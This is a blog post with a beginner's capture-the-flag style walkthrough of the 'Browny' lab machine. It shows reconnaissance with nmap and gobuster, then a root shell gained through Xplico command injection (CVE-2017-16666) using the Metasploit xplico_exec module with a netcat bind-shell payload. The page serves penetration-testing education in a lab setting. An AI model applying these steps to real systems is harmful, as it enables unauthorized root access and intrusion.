<!DOCTYPE html>
<html lang="en">
<head>
  
    <title>Browny Machine Writeup (easy) :: Hello Friend — A simple theme for Hugo</title>
  
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1">
<meta name="description" content="====================== Quick Summary
Hey guys , today I will walkthrough step by step in Browny Machine. this Machine is so good for beginner in pentration testing you will gonna learn a lot in this experenice. It is an easy linux machine , We will exploit Xplico Remote Code Execution in a vulnerable version Xplico that listen on port 9876 by default. There is a hidden end-point at inside of the Xplico that allow anyone to create a new user that can execute a terminal command under the context of the root user."/>
<meta name="keywords" content=""/>
<meta name="robots" content="noodp"/>
<link rel="canonical" href="https://ahmedameenaim.github.io/username.github.io/posts/writeup1/" />


<link rel="stylesheet" href="https://ahmedameenaim.github.io/username.github.io/assets/style.css">


<link rel="stylesheet" href="https://ahmedameenaim.github.io/username.github.io/style.css">


<link rel="apple-touch-icon-precomposed" sizes="144x144" href="https://ahmedameenaim.github.io/username.github.io/img/apple-touch-icon-144-precomposed.png">
<link rel="shortcut icon" href="https://ahmedameenaim.github.io/username.github.io/img/favicon.png">


<meta name="twitter:card" content="summary" />
<meta name="twitter:title" content="Browny Machine Writeup (easy) :: Hello Friend — A simple theme for Hugo" />
<meta name="twitter:description" content="====================== Quick Summary
Hey guys , today I will walkthrough step by step in Browny Machine. this Machine is so good for beginner in pentration testing you will gonna learn a lot in this experenice. It is an easy linux machine , We will exploit Xplico Remote Code Execution in a vulnerable version Xplico that listen on port 9876 by default. There is a hidden end-point at inside of the Xplico that allow anyone to create a new user that can execute a terminal command under the context of the root user." />
<meta name="twitter:site" content="https://ahmedameenaim.github.io/username.github.io" />
<meta name="twitter:creator" content="Ahmed Amin" />
<meta name="twitter:image" content="https://ahmedameenaim.github.io/username.github.io/cover.jpg">


<meta property="og:locale" content="en" />
<meta property="og:type" content="article" />
<meta property="og:title" content="Browny Machine Writeup (easy) :: Hello Friend — A simple theme for Hugo">
<meta property="og:description" content="====================== Quick Summary
Hey guys , today I will walkthrough step by step in Browny Machine. this Machine is so good for beginner in pentration testing you will gonna learn a lot in this experenice. It is an easy linux machine , We will exploit Xplico Remote Code Execution in a vulnerable version Xplico that listen on port 9876 by default. There is a hidden end-point at inside of the Xplico that allow anyone to create a new user that can execute a terminal command under the context of the root user." />
<meta property="og:url" content="https://ahmedameenaim.github.io/username.github.io/posts/writeup1/" />
<meta property="og:site_name" content="Browny Machine Writeup (easy)" />
<meta property="og:image" content="https://ahmedameenaim.github.io/username.github.io/cover.jpg">
<meta property="og:image:width" content="2048">
<meta property="og:image:height" content="1024">

<meta property="article:published_time" content="2019-04-28 01:12:17 &#43;0200 EET" />









</head>
<body class="dark-theme">
<div class="container">
  <header class="header">
  <span class="header__inner">
    <a href="https://ahmedameenaim.github.io/username.github.io" class="logo" style="text-decoration: none;">
  
    <span class="logo__mark"><svg xmlns="http://www.w3.org/2000/svg" class="greater-icon" width="44" height="44" viewBox="0 0 44 44">
  <polyline fill="none" stroke="#000" stroke-width="2" points="15 8 29.729 22.382 15 35.367"/>
</svg>
</span>
    <span class="logo__text">Welcome to the Rabbit Hole</span>
    <span class="logo__cursor"></span>
  
</a>

    <span class="header__right">
      
        <nav class="menu">
  <ul class="menu__inner menu__inner--desktop">
    
      
        
          <li><a href="/username.github.io/about">About</a></li>
        
      
        
          <li><a href="/username.github.io/showcase">Showcase</a></li>
        
      
      
    
  </ul>

  <ul class="menu__inner menu__inner--mobile">
    
      
        <li><a href="/username.github.io/about">About</a></li>
      
    
      
        <li><a href="/username.github.io/showcase">Showcase</a></li>
      
    
  </ul>
</nav>

        <span class="menu-trigger">
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
            <path d="M0 0h24v24H0z" fill="none"/>
            <path d="M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z"/>
          </svg>
        </span>
      
      <span class="theme-toggle">
        <svg class="theme-toggler" width="24" height="24" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">
  <path d="M22 41C32.4934 41 41 32.4934 41 22C41 11.5066 32.4934 3 22
  3C11.5066 3 3 11.5066 3 22C3 32.4934 11.5066 41 22 41ZM7 22C7
  13.7157 13.7157 7 22 7V37C13.7157 37 7 30.2843 7 22Z"/>
</svg>

      </span>
    </span>
  </span>
</header>


  <div class="content">
    
  <div class="post">
    <h2 class="post-title"><a href="https://ahmedameenaim.github.io/username.github.io/posts/writeup1/">Browny Machine Writeup (easy)</a></h2>
    <div class="post-meta">
      
        <span class="post-date">
            2019-04-28
        </span>
      
      <span class="post-author">— Written by Ahmed Amin</span>
      
        <span class="post-read-time">— 4 min read</span>
      
    </div>

    

    
      
        <img src="https://ahmedameenaim.github.io/username.github.io/cover.jpg" class="post-cover" />
      
    

    <div class="post-content">
      

<p>======================
<h2>Quick Summary</h2></p>

<p>Hey guys , today I will walkthrough step by step in Browny Machine.
this Machine is so good for beginner in pentration testing you will gonna learn a lot in this experenice.
It is an easy linux machine , We will exploit Xplico Remote Code Execution in a vulnerable version Xplico that listen on port 9876 by default. There is a hidden end-point at inside of the Xplico that allow anyone to create a new user that can execute a terminal command under the context of the root user.
its ip is 10.1.1.17 I gonna added it to /etc/hosts as Browny.lab<br>
Let’s get Start !</p>

<p>======================
<h2>Infomartions Gathering Phase</h2>
<h3>#Nmap</h3></p>

<p>We will use nmap tool for collecting informations about our target such as what services are running , whats its versions and does those services has potential vulnerabilities.</p>

<p><style>
pre {
    color: cyan;
}
</style>
<pre>
nmap -sV -sC -sT Browny.lab
</pre></p>

<blockquote>
<p>sV: for version detection <br>
sC: for lunch default scripts againts services <br>
sT: for system is used to open a connection to every interesting port on the machine</p>
</blockquote>

<p><img src="https://ahmedameenaim.github.io/username.github.io/posts/images/nmap.PNG" alt="nmap.PNG" /></p>

<h3>we notice that there three  ports are open.</h3>
we can access the machine via ssh protocol but we don't have any crediantials to able to access via ssh.
so we can to  do http enumeration for finding any clues that lead us to access the machine through that way



it just a dummy html page. and nothing more.

<img src = "https://ahmedameenaim.github.io/username.github.io/posts/images/dummy.png">

<h3>#Brupsuite</h3>
Via Brupsuite lets check The Get Request to server and Response Maybe we found something useful.
<img src = "https://ahmedameenaim.github.io/username.github.io/posts/images/dummy2.PNG">
Not Much except the explico that will be a great indicator for gaining access for this machine.

always while you doing http enumeration try to brute force subdirectries for finding any intersesting web pages could give you a greate information about your target

<h3>#Gobuster</h3>
Gobuster is such a greate tool for brute forcing hidden directories in web application.
<pre>
gobuster -u 'http://Browny.lab' -w /usr/share/wordlists/dirb/common.txt
</pre>

<img src = "https://ahmedameenaim.github.io/username.github.io/posts/images/dummy3.PNG">
based on the response code we got they have 403 which mean we don't have premission to access to those webpages.


<h2>vulnerabilty detection and analysis</h2>
after doing info-garthing we got only one clue that can lead us to gain access. the explico service is running.
so what is explico ? explico is a piece of software that used for parsing pcap files that help forensics team
for collecting evidence and artifacts.Xplico extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on. the problem is  There is a hidden end-point at inside of the Xplico that allow anyone to create a new user with premission of root.once the pcap file uploaded .
Xplico execute an operating system command in order to calculate checksum of the file. Name of the for this operation is direclty taken from user input and then used at inside of the command without proper input validation. so we can execute a shell on system and gain access.<br> <a href ="https://www.rapid7.com/db/modules/exploit/linux/http/xplico_exec">there is a metasploit module will do all the hard works to take advantage of this flaw</a>


<h2>Exploitation Phase</h2>
<h3>#Metasploit</h3>

<p>lets lunch the Metasploit framework and doing research on xplico http exploit
By doing search we will find exploit with rank excellent
<pre>
grep http search xplico
use exploit/linux/http/xplico_exec
</pre>
<img src="https://ahmedameenaim.github.io/username.github.io/posts/images/meta1.PNG" alt="meta1.PNG" />
<pre>
show options
set LHOST 10.253.x.x
set LHOST 10.1.1.17
show payloads
set  PAYLOAD cmd/unix/bind_netcat
</pre></p>

<p><img src="https://ahmedameenaim.github.io/username.github.io/posts/images/meta2.png" alt="meta2.PNG" /></p>

<p>and now we have a shell.let do id command line to know make sure about privilege as root
we play an easy machine so don&rsquo;t need to privilege escalation or any complicated stuffs. all we need to do
is explore the system files after we sure that we are root. and open the root.txt and user.txt to  get the flags
<pre>
id
pwd
find /home
find /root
cat /home/granit/usr.txt
cat /root/root.txt</p>

<h1 id="pre"></pre></h1>

<p><h2>Understanding The Exploitation in Depth</h2>
I recommend you to read this artical <a href="https://pentest.blog/advisory-xplico-unauthenticated-remote-code-execution-cve-2017-16666/">Readme</a> will explain to you the details of the flaw in explico
this step is essential to not be a script kid that know doing stuffs without knowing what happing behind the scene</p>

<p>that&rsquo;s all about this machine.
<h4>Stay tuned for upcoming series</h4>
<h3>Feedback is it very appreciate</h3></p>

    </div>
    

    

    </div>

  </div>

  
    <footer class="footer">
  <div class="footer__inner">
    
      <a href="https://ahmedameenaim.github.io/username.github.io" class="logo" style="text-decoration: none;">
  
    <span class="logo__mark"><svg xmlns="http://www.w3.org/2000/svg" class="greater-icon" width="44" height="44" viewBox="0 0 44 44">
  <polyline fill="none" stroke="#000" stroke-width="2" points="15 8 29.729 22.382 15 35.367"/>
</svg>
</span>
    <span class="logo__text">Welcome to the Rabbit Hole</span>
    <span class="logo__cursor"></span>
  
</a>

      <div class="copyright">
        <span>© 2019 Powered by Anonymous</span>
        
      </div>
    
  </div>
</footer>

<script src="https://ahmedameenaim.github.io/username.github.io/assets/main.js"></script>
<script src="https://ahmedameenaim.github.io/username.github.io/assets/prism.js"></script>


  
</div>

</body>
</html>
